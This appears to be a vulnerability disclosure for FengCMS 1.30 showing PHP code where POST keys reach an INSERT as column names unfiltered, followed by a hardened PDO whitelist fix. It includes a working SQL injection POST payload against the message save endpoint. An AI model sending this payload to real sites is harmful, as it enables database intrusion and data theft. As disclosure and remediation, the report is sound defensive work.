### Brief description:
http://www.fengcms.com/
Latest version 1.30
### Details:
app\model\messageModel.php
```php
// Vulnerable as shipped: $array (POST data) is passed to insert() without
// validating its keys, so attacker-controlled column names reach the SQL.
public function save($array){
    if($_SESSION['authnum']!=$array['vcode']||$_SESSION['authnum']==""){ return array('status' => 'c');exit;}
    unset($array['vcode']);
    $re=D($this->d_name)->insert($array);   // array keys become column names unfiltered
    if($re){
        $_SESSION['authnum']="";
        return array('status' => 'y','id' => $re);
    }else{
        return array('status' => 'n','id' => $re);
    }
}
```
`$re=D($this->d_name)->insert($array);`
The array keys are not filtered before being used as column names.
Backticks in a key are not affected by the value escaping, so a crafted key closes the column list and injects into the INSERT statement.
Payload:
POST /?controller=message&operate=save
title`,`name`,`qq`,`tel`,`mail`,`content`,`time`)values(user(),qq,qq,qq,qq,qq,1426038685);#insert/**/into/**/`f_message`/**/(`title=testsql&name=&qq=&tel=&mail=&content=aaaaaaaaaaaa&vcode=vzyd&time=1426039319
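As an added example (not FengCMS code), here is a hardened replacement for the unfiltered `insert($array)` pattern: column names are checked against a fixed whitelist and values are bound through PDO, so a key shaped like the payload above is rejected before any SQL is built. The `f_message` column names are taken from the payload; `safeInsertMessage` and the SQLite setup are assumptions for illustration.

```php
<?php
// Added example, not FengCMS code. Whitelisted columns of `f_message` (from the report's payload).
const MESSAGE_COLUMNS = ['title', 'name', 'qq', 'tel', 'mail', 'content', 'time'];

/**
 * Insert a row into `f_message`, accepting only whitelisted column names.
 * Values are bound as parameters; keys never reach the SQL unless they match exactly.
 * Returns the new row id, or throws on any unexpected key.
 */
function safeInsertMessage(PDO $db, array $data): string {
    $cols = [];
    $params = [];
    foreach ($data as $key => $value) {
        // Strict comparison: the key must be one of the known columns, nothing else.
        if (!in_array($key, MESSAGE_COLUMNS, true)) {
            throw new InvalidArgumentException('Rejected column name: ' . $key);
        }
        $cols[] = "`{$key}`";
        $params[":{$key}"] = $value;
    }
    if ($cols === []) {
        throw new InvalidArgumentException('No columns to insert');
    }
    $sql = sprintf(
        'INSERT INTO `f_message` (%s) VALUES (%s)',
        implode(', ', $cols),
        implode(', ', array_keys($params))
    );
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $db->lastInsertId();
}

// Constructed in-memory SQLite table so the check can be exercised without a MySQL server.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE f_message (id INTEGER PRIMARY KEY, title TEXT, name TEXT, qq TEXT, '
        . 'tel TEXT, mail TEXT, content TEXT, time INTEGER)');

// Legitimate submission (vcode already removed by the caller, as save() does).
echo safeInsertMessage($db, ['title' => 'hello', 'name' => 'bob', 'content' => 'hi', 'time' => 1426039319]), "\n";

// A key carrying backticks, like the report's payload, is refused before any SQL is assembled.
try {
    safeInsertMessage($db, ['title`,`name`) VALUES (1,2);#' => 'x']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

The same whitelist check belongs in the shared `insert()` helper, since every model that forwards request arrays to it has the same exposure.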
### Proof of vulnerability:
![fengcms#1.png](https://images.seebug.org/upload/201503/11103743036c89090cbbb5d4b50e5c656a0b0210.png)
![fengcms#2.png](https://images.seebug.org/upload/201503/111039099e181f84a5a3442bdcf4ac15accc0562.png)
![fengcms3.png](https://images.seebug.org/upload/201503/11103923e543e4202ed88bbf973ce7be99002606.png)